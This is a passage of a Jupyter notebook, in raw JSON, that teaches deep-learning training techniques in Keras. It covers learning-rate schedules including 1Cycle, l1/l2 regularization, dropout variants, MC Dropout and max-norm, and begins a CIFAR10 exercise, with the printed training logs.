0.8904\n" ] ], [ [ "For piecewise constant scheduling, try this:", 
"_____no_output_____" ] ], [ [ "learning_rate = keras.optimizers.schedules.PiecewiseConstantDecay(\n boundaries=[5. * n_steps_per_epoch, 15. * n_steps_per_epoch],\n values=[0.01, 0.005, 0.001])", "_____no_output_____" ] ], [ [ "### 1Cycle scheduling", "_____no_output_____" ] ], [ [ "K = keras.backend\n\nclass ExponentialLearningRate(keras.callbacks.Callback):\n def __init__(self, factor):\n self.factor = factor\n self.rates = []\n self.losses = []\n def on_batch_end(self, batch, logs):\n self.rates.append(K.get_value(self.model.optimizer.learning_rate))\n self.losses.append(logs[\"loss\"])\n K.set_value(self.model.optimizer.learning_rate, self.model.optimizer.learning_rate * self.factor)\n\ndef find_learning_rate(model, X, y, epochs=1, batch_size=32, min_rate=10**-5, max_rate=10):\n init_weights = model.get_weights()\n iterations = math.ceil(len(X) / batch_size) * epochs\n factor = np.exp(np.log(max_rate / min_rate) / iterations)\n init_lr = K.get_value(model.optimizer.learning_rate)\n K.set_value(model.optimizer.learning_rate, min_rate)\n exp_lr = ExponentialLearningRate(factor)\n history = model.fit(X, y, epochs=epochs, batch_size=batch_size,\n callbacks=[exp_lr])\n K.set_value(model.optimizer.learning_rate, init_lr)\n model.set_weights(init_weights)\n return exp_lr.rates, exp_lr.losses\n\ndef plot_lr_vs_loss(rates, losses):\n plt.plot(rates, losses)\n plt.gca().set_xscale('log')\n plt.hlines(min(losses), min(rates), max(rates))\n plt.axis([min(rates), max(rates), min(losses), (losses[0] + min(losses)) / 2])\n plt.xlabel(\"Learning rate\")\n plt.ylabel(\"Loss\")", "_____no_output_____" ] ], [ [ "**Warning**: In the `on_batch_end()` method, `logs[\"loss\"]` used to contain the batch loss, but in TensorFlow 2.2.0 it was replaced with the mean loss (since the start of the epoch). This explains why the graph below is much smoother than in the book (if you are using TF 2.2 or above). 
It also means that there is a lag between the moment the batch loss starts exploding and the moment the explosion becomes clear in the graph. So you should choose a slightly smaller learning rate than you would have chosen with the \"noisy\" graph. Alternatively, you can tweak the `ExponentialLearningRate` callback above so it computes the batch loss (based on the current mean loss and the previous mean loss):\n\n```python\nclass ExponentialLearningRate(keras.callbacks.Callback):\n def __init__(self, factor):\n self.factor = factor\n self.rates = []\n self.losses = []\n def on_epoch_begin(self, epoch, logs=None):\n self.prev_loss = 0\n def on_batch_end(self, batch, logs=None):\n batch_loss = logs[\"loss\"] * (batch + 1) - self.prev_loss * batch\n self.prev_loss = logs[\"loss\"]\n self.rates.append(K.get_value(self.model.optimizer.learning_rate))\n self.losses.append(batch_loss)\n K.set_value(self.model.optimizer.learning_rate, self.model.optimizer.learning_rate * self.factor)\n```", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "batch_size = 128\nrates, losses = find_learning_rate(model, X_train_scaled, y_train, epochs=1, batch_size=batch_size)\nplot_lr_vs_loss(rates, losses)", "430/430 [==============================] - 1s 2ms/step - loss: nan - accuracy: 0.3120\n" ], [ "class OneCycleScheduler(keras.callbacks.Callback):\n def __init__(self, iterations, max_rate, start_rate=None,\n last_iterations=None, last_rate=None):\n self.iterations = iterations\n self.max_rate = 
max_rate\n self.start_rate = start_rate or max_rate / 10\n self.last_iterations = last_iterations or iterations // 10 + 1\n self.half_iteration = (iterations - self.last_iterations) // 2\n self.last_rate = last_rate or self.start_rate / 1000\n self.iteration = 0\n def _interpolate(self, iter1, iter2, rate1, rate2):\n return ((rate2 - rate1) * (self.iteration - iter1)\n / (iter2 - iter1) + rate1)\n def on_batch_begin(self, batch, logs):\n if self.iteration < self.half_iteration:\n rate = self._interpolate(0, self.half_iteration, self.start_rate, self.max_rate)\n elif self.iteration < 2 * self.half_iteration:\n rate = self._interpolate(self.half_iteration, 2 * self.half_iteration,\n self.max_rate, self.start_rate)\n else:\n rate = self._interpolate(2 * self.half_iteration, self.iterations,\n self.start_rate, self.last_rate)\n self.iteration += 1\n K.set_value(self.model.optimizer.learning_rate, rate)", "_____no_output_____" ], [ "n_epochs = 25\nonecycle = OneCycleScheduler(math.ceil(len(X_train) / batch_size) * n_epochs, max_rate=0.05)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs, batch_size=batch_size,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[onecycle])", "Epoch 1/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.6572 - accuracy: 0.7740 - val_loss: 0.4872 - val_accuracy: 0.8338\nEpoch 2/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.4580 - accuracy: 0.8397 - val_loss: 0.4274 - val_accuracy: 0.8520\nEpoch 3/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.4121 - accuracy: 0.8545 - val_loss: 0.4116 - val_accuracy: 0.8588\nEpoch 4/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3837 - accuracy: 0.8642 - val_loss: 0.3868 - val_accuracy: 0.8688\nEpoch 5/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3639 - accuracy: 0.8719 - val_loss: 0.3766 - val_accuracy: 0.8688\nEpoch 6/25\n430/430 [==============================] - 1s 2ms/step - 
loss: 0.3456 - accuracy: 0.8775 - val_loss: 0.3739 - val_accuracy: 0.8706\nEpoch 7/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3330 - accuracy: 0.8811 - val_loss: 0.3635 - val_accuracy: 0.8708\nEpoch 8/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3184 - accuracy: 0.8861 - val_loss: 0.3959 - val_accuracy: 0.8610\nEpoch 9/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3065 - accuracy: 0.8890 - val_loss: 0.3475 - val_accuracy: 0.8770\nEpoch 10/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2943 - accuracy: 0.8927 - val_loss: 0.3392 - val_accuracy: 0.8806\nEpoch 11/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2838 - accuracy: 0.8963 - val_loss: 0.3467 - val_accuracy: 0.8800\nEpoch 12/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2707 - accuracy: 0.9024 - val_loss: 0.3646 - val_accuracy: 0.8696\nEpoch 13/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2536 - accuracy: 0.9079 - val_loss: 0.3350 - val_accuracy: 0.8842\nEpoch 14/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2405 - accuracy: 0.9135 - val_loss: 0.3465 - val_accuracy: 0.8794\nEpoch 15/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2279 - accuracy: 0.9185 - val_loss: 0.3257 - val_accuracy: 0.8830\nEpoch 16/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2159 - accuracy: 0.9232 - val_loss: 0.3294 - val_accuracy: 0.8824\nEpoch 17/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.2062 - accuracy: 0.9263 - val_loss: 0.3333 - val_accuracy: 0.8882\nEpoch 18/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1978 - accuracy: 0.9301 - val_loss: 0.3235 - val_accuracy: 0.8898\nEpoch 19/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1892 - accuracy: 0.9337 - val_loss: 0.3233 - val_accuracy: 0.8906\nEpoch 20/25\n430/430 
[==============================] - 1s 2ms/step - loss: 0.1821 - accuracy: 0.9365 - val_loss: 0.3224 - val_accuracy: 0.8928\nEpoch 21/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1752 - accuracy: 0.9400 - val_loss: 0.3220 - val_accuracy: 0.8908\nEpoch 22/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1700 - accuracy: 0.9416 - val_loss: 0.3180 - val_accuracy: 0.8962\nEpoch 23/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1655 - accuracy: 0.9438 - val_loss: 0.3187 - val_accuracy: 0.8940\nEpoch 24/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1627 - accuracy: 0.9454 - val_loss: 0.3177 - val_accuracy: 0.8932\nEpoch 25/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.1610 - accuracy: 0.9462 - val_loss: 0.3170 - val_accuracy: 0.8934\n" ] ], [ [ "# Avoiding Overfitting Through Regularization", "_____no_output_____" ], [ "## $\\ell_1$ and $\\ell_2$ regularization", "_____no_output_____" ] ], [ [ "layer = keras.layers.Dense(100, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n# or l1(0.1) for ℓ1 regularization with a factor of 0.1\n# or l1_l2(0.1, 0.01) for both ℓ1 and ℓ2 regularization, with factors 0.1 and 0.01 respectively", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01)),\n keras.layers.Dense(100, activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01)),\n keras.layers.Dense(10, activation=\"softmax\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, 
y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 3.2189 - accuracy: 0.7967 - val_loss: 0.7169 - val_accuracy: 0.8340\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.7280 - accuracy: 0.8247 - val_loss: 0.6850 - val_accuracy: 0.8376\n" ], [ "from functools import partial\n\nRegularizedDense = partial(keras.layers.Dense,\n activation=\"elu\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(0.01))\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n RegularizedDense(300),\n RegularizedDense(100),\n RegularizedDense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 3.2911 - accuracy: 0.7924 - val_loss: 0.7218 - val_accuracy: 0.8310\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.7282 - accuracy: 0.8245 - val_loss: 0.6826 - val_accuracy: 0.8382\n" ] ], [ [ "## Dropout", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(300, activation=\"elu\", kernel_initializer=\"he_normal\"),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(100, activation=\"elu\", kernel_initializer=\"he_normal\"),\n keras.layers.Dropout(rate=0.2),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 6s 3ms/step - loss: 0.7611 - accuracy: 0.7576 - val_loss: 
0.3730 - val_accuracy: 0.8644\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4306 - accuracy: 0.8401 - val_loss: 0.3395 - val_accuracy: 0.8722\n" ] ], [ [ "## Alpha Dropout", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.AlphaDropout(rate=0.2),\n keras.layers.Dense(10, activation=\"softmax\")\n])\noptimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 20\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.8023 - accuracy: 0.7146 - val_loss: 0.5781 - val_accuracy: 0.8442\nEpoch 2/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.5663 - accuracy: 0.7905 - val_loss: 0.5182 - val_accuracy: 0.8520\nEpoch 3/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5264 - accuracy: 0.8054 - val_loss: 0.4874 - val_accuracy: 0.8600\nEpoch 4/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5126 - accuracy: 0.8092 - val_loss: 0.4890 - val_accuracy: 0.8598\nEpoch 5/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5071 - accuracy: 0.8133 - val_loss: 0.4266 - val_accuracy: 0.8696\nEpoch 6/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4793 - accuracy: 0.8198 - val_loss: 0.4585 - val_accuracy: 0.8640\nEpoch 7/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 
0.4724 - accuracy: 0.8262 - val_loss: 0.4740 - val_accuracy: 0.8612\nEpoch 8/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4570 - accuracy: 0.8297 - val_loss: 0.4295 - val_accuracy: 0.8656\nEpoch 9/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4632 - accuracy: 0.8286 - val_loss: 0.4357 - val_accuracy: 0.8736\nEpoch 10/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4552 - accuracy: 0.8340 - val_loss: 0.4366 - val_accuracy: 0.8674\nEpoch 11/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4461 - accuracy: 0.8346 - val_loss: 0.4278 - val_accuracy: 0.8684\nEpoch 12/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4419 - accuracy: 0.8351 - val_loss: 0.5086 - val_accuracy: 0.8558\nEpoch 13/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4329 - accuracy: 0.8385 - val_loss: 0.4280 - val_accuracy: 0.8728\nEpoch 14/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4305 - accuracy: 0.8399 - val_loss: 0.4460 - val_accuracy: 0.8628\nEpoch 15/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4315 - accuracy: 0.8397 - val_loss: 0.4361 - val_accuracy: 0.8706\nEpoch 16/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4251 - accuracy: 0.8403 - val_loss: 0.4280 - val_accuracy: 0.8758\nEpoch 17/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4207 - accuracy: 0.8427 - val_loss: 0.5336 - val_accuracy: 0.8584\nEpoch 18/20\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.4365 - accuracy: 0.8387 - val_loss: 0.4769 - val_accuracy: 0.8736\nEpoch 19/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4262 - accuracy: 0.8409 - val_loss: 0.4636 - val_accuracy: 0.8706\nEpoch 20/20\n1719/1719 [==============================] - 3s 1ms/step - loss: 0.4189 - accuracy: 0.8421 - val_loss: 0.4388 - val_accuracy: 0.8760\n" ], [ 
"model.evaluate(X_test_scaled, y_test)", "313/313 [==============================] - 0s 834us/step - loss: 0.4723 - accuracy: 0.8639\n" ], [ "model.evaluate(X_train_scaled, y_train)", "1719/1719 [==============================] - 1s 782us/step - loss: 0.3501 - accuracy: 0.8840\n" ], [ "history = model.fit(X_train_scaled, y_train)", "1719/1719 [==============================] - 2s 1ms/step - loss: 0.4225 - accuracy: 0.8432\n" ] ], [ [ "## MC Dropout", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "y_probas = np.stack([model(X_test_scaled, training=True)\n for sample in range(100)])\ny_proba = y_probas.mean(axis=0)\ny_std = y_probas.std(axis=0)", "_____no_output_____" ], [ "np.round(model.predict(X_test_scaled[:1]), 2)", "_____no_output_____" ], [ "np.round(y_probas[:, :1], 2)", "_____no_output_____" ], [ "np.round(y_proba[:1], 2)", "_____no_output_____" ], [ "y_std = y_probas.std(axis=0)\nnp.round(y_std[:1], 2)", "_____no_output_____" ], [ "y_pred = np.argmax(y_proba, axis=1)", "_____no_output_____" ], [ "accuracy = np.sum(y_pred == y_test) / len(y_test)\naccuracy", "_____no_output_____" ], [ "class MCDropout(keras.layers.Dropout):\n def call(self, inputs):\n return super().call(inputs, training=True)\n\nclass MCAlphaDropout(keras.layers.AlphaDropout):\n def call(self, inputs):\n return super().call(inputs, training=True)", "_____no_output_____" ], [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "mc_model = keras.models.Sequential([\n MCAlphaDropout(layer.rate) if isinstance(layer, keras.layers.AlphaDropout) else layer\n for layer in model.layers\n])", "_____no_output_____" ], [ "mc_model.summary()", "Model: \"sequential_20\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nflatten_18 (Flatten) (None, 784) 0 
\n_________________________________________________________________\nmc_alpha_dropout (MCAlphaDro (None, 784) 0 \n_________________________________________________________________\ndense_262 (Dense) (None, 300) 235500 \n_________________________________________________________________\nmc_alpha_dropout_1 (MCAlphaD (None, 300) 0 \n_________________________________________________________________\ndense_263 (Dense) (None, 100) 30100 \n_________________________________________________________________\nmc_alpha_dropout_2 (MCAlphaD (None, 100) 0 \n_________________________________________________________________\ndense_264 (Dense) (None, 10) 1010 \n=================================================================\nTotal params: 266,610\nTrainable params: 266,610\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "optimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True)\nmc_model.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])", "_____no_output_____" ], [ "mc_model.set_weights(model.get_weights())", "_____no_output_____" ] ], [ [ "Now we can use the model with MC Dropout:", "_____no_output_____" ] ], [ [ "np.round(np.mean([mc_model.predict(X_test_scaled[:1]) for sample in range(100)], axis=0), 2)", "_____no_output_____" ] ], [ [ "## Max norm", "_____no_output_____" ] ], [ [ "layer = keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\",\n kernel_constraint=keras.constraints.max_norm(1.))", "_____no_output_____" ], [ "MaxNormDense = partial(keras.layers.Dense,\n activation=\"selu\", kernel_initializer=\"lecun_normal\",\n kernel_constraint=keras.constraints.max_norm(1.))\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n MaxNormDense(300),\n MaxNormDense(100),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", 
metrics=[\"accuracy\"])\nn_epochs = 2\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.5763 - accuracy: 0.8020 - val_loss: 0.3674 - val_accuracy: 0.8674\nEpoch 2/2\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.3545 - accuracy: 0.8709 - val_loss: 0.3714 - val_accuracy: 0.8662\n" ] ], [ [ "# Exercises", "_____no_output_____" ], [ "## 1. to 7.", "_____no_output_____" ], [ "See appendix A.", "_____no_output_____" ], [ "## 8. Deep Learning on CIFAR10", "_____no_output_____" ], [ "### a.\n*Exercise: Build a DNN with 20 hidden layers of 100 neurons each (that's too many, but it's the point of this exercise). Use He initialization and the ELU activation function.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n activation=\"elu\",\n kernel_initializer=\"he_normal\"))", "_____no_output_____" ] ], [ [ "### b.\n*Exercise: Using Nadam optimization and early stopping, train the network on the CIFAR10 dataset. You can load it with `keras.datasets.cifar10.load_data()`. The dataset is composed of 60,000 32 × 32–pixel color images (50,000 for training, 10,000 for testing) with 10 classes, so you'll need a softmax output layer with 10 neurons. Remember to search for the right learning rate each time you change the model's architecture or hyperparameters.*", "_____no_output_____" ], [ "Let's add the output layer to the model:", "_____no_output_____" ] ], [ [ "model.add(keras.layers.Dense(10, activation=\"softmax\"))", "_____no_output_____" ] ], [ [ "Let's use a Nadam optimizer with a learning rate of 5e-5. 
I tried learning rates 1e-5, 3e-5, 1e-4, 3e-4, 1e-3, 3e-3 and 1e-2, and I compared their learning curves for 10 epochs each (using the TensorBoard callback, below). The learning rates 3e-5 and 1e-4 were pretty good, so I tried 5e-5, which turned out to be slightly better.", "_____no_output_____" ] ], [ [ "optimizer = keras.optimizers.Nadam(learning_rate=5e-5)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ] ], [ [ "Let's load the CIFAR10 dataset. We also want to use early stopping, so we need a validation set. Let's use the first 5,000 images of the original training set as the validation set:", "_____no_output_____" ] ], [ [ "(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.cifar10.load_data()\n\nX_train = X_train_full[5000:]\ny_train = y_train_full[5000:]\nX_valid = X_train_full[:5000]\ny_valid = y_train_full[:5000]", "_____no_output_____" ] ], [ [ "Now we can create the callbacks we need and train the model:", "_____no_output_____" ] ], [ [ "early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]", "_____no_output_____" ], [ "%tensorboard --logdir=./my_cifar10_logs --port=6006", "_____no_output_____" ], [ "model.fit(X_train, y_train, epochs=100,\n validation_data=(X_valid, y_valid),\n callbacks=callbacks)", "Epoch 1/100\n1407/1407 [==============================] - 9s 5ms/step - loss: 9.4191 - accuracy: 0.1388 - val_loss: 2.2328 - val_accuracy: 0.2040\nEpoch 2/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 2.1097 - accuracy: 0.2317 - val_loss: 2.0485 - 
val_accuracy: 0.2402\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.9667 - accuracy: 0.2844 - val_loss: 1.9681 - val_accuracy: 0.2964\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.8740 - accuracy: 0.3149 - val_loss: 1.9178 - val_accuracy: 0.3254\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.8064 - accuracy: 0.3423 - val_loss: 1.8256 - val_accuracy: 0.3384\nEpoch 6/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.7525 - accuracy: 0.3595 - val_loss: 1.7430 - val_accuracy: 0.3692\nEpoch 7/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.7116 - accuracy: 0.3819 - val_loss: 1.7199 - val_accuracy: 0.3824\nEpoch 8/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.6782 - accuracy: 0.3935 - val_loss: 1.6746 - val_accuracy: 0.3972\nEpoch 9/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.6517 - accuracy: 0.4025 - val_loss: 1.6622 - val_accuracy: 0.4004\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.6140 - accuracy: 0.4194 - val_loss: 1.7065 - val_accuracy: 0.3840\nEpoch 11/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5884 - accuracy: 0.4301 - val_loss: 1.6736 - val_accuracy: 0.3914\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5640 - accuracy: 0.4378 - val_loss: 1.6220 - val_accuracy: 0.4224\nEpoch 13/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5437 - accuracy: 0.4448 - val_loss: 1.6332 - val_accuracy: 0.4144\nEpoch 14/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5214 - accuracy: 0.4555 - val_loss: 1.5785 - val_accuracy: 0.4326\nEpoch 15/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5117 - accuracy: 0.4564 - val_loss: 1.6267 - val_accuracy: 0.4164\nEpoch 16/100\n1407/1407 [==============================] - 
7s 5ms/step - loss: 1.4972 - accuracy: 0.4622 - val_loss: 1.5846 - val_accuracy: 0.4316\nEpoch 17/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4888 - accuracy: 0.4661 - val_loss: 1.5549 - val_accuracy: 0.4420\nEpoch 18/100\n<<24 more lines>>\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3362 - accuracy: 0.5212 - val_loss: 1.6025 - val_accuracy: 0.4500\nEpoch 31/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3360 - accuracy: 0.5207 - val_loss: 1.5175 - val_accuracy: 0.4602\nEpoch 32/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3031 - accuracy: 0.5302 - val_loss: 1.5397 - val_accuracy: 0.4572\nEpoch 33/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.3082 - accuracy: 0.5308 - val_loss: 1.4997 - val_accuracy: 0.4776\nEpoch 34/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2882 - accuracy: 0.5338 - val_loss: 1.5482 - val_accuracy: 0.4620\nEpoch 35/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2889 - accuracy: 0.5355 - val_loss: 1.5474 - val_accuracy: 0.4604\nEpoch 36/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2761 - accuracy: 0.5410 - val_loss: 1.5434 - val_accuracy: 0.4658\nEpoch 37/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2658 - accuracy: 0.5481 - val_loss: 1.5502 - val_accuracy: 0.4706\nEpoch 38/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2554 - accuracy: 0.5489 - val_loss: 1.5527 - val_accuracy: 0.4624\nEpoch 39/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2504 - accuracy: 0.5471 - val_loss: 1.5482 - val_accuracy: 0.4602\nEpoch 40/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2516 - accuracy: 0.5545 - val_loss: 1.5881 - val_accuracy: 0.4574\nEpoch 41/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2401 - accuracy: 0.5566 - 
val_loss: 1.5403 - val_accuracy: 0.4670\nEpoch 42/100\n1407/1407 [==============================] - 8s 5ms/step - loss: 1.2305 - accuracy: 0.5570 - val_loss: 1.5343 - val_accuracy: 0.4790\nEpoch 43/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2228 - accuracy: 0.5615 - val_loss: 1.5344 - val_accuracy: 0.4708\nEpoch 44/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2161 - accuracy: 0.5619 - val_loss: 1.5782 - val_accuracy: 0.4526\nEpoch 45/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2124 - accuracy: 0.5641 - val_loss: 1.5182 - val_accuracy: 0.4794\nEpoch 46/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1870 - accuracy: 0.5766 - val_loss: 1.5435 - val_accuracy: 0.4650\nEpoch 47/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1925 - accuracy: 0.5701 - val_loss: 1.5532 - val_accuracy: 0.4686\n" ], [ "model = keras.models.load_model(\"my_cifar10_model.h5\")\nmodel.evaluate(X_valid, y_valid)", "157/157 [==============================] - 0s 1ms/step - loss: 1.4960 - accuracy: 0.4762\n" ] ], [ [ "The model with the lowest validation loss gets about 47.6% accuracy on the validation set. It took 27 epochs to reach the lowest validation loss, with roughly 8 seconds per epoch on my laptop (without a GPU). Let's see if we can improve performance using Batch Normalization.", "_____no_output_____" ], [ "### c.\n*Exercise: Now try adding Batch Normalization and compare the learning curves: Is it converging faster than before? Does it produce a better model? How does it affect training speed?*", "_____no_output_____" ], [ "The code below is very similar to the code above, with a few changes:\n\n* I added a BN layer after every Dense layer (before the activation function), except for the output layer. I also added a BN layer before the first hidden layer.\n* I changed the learning rate to 5e-4. 
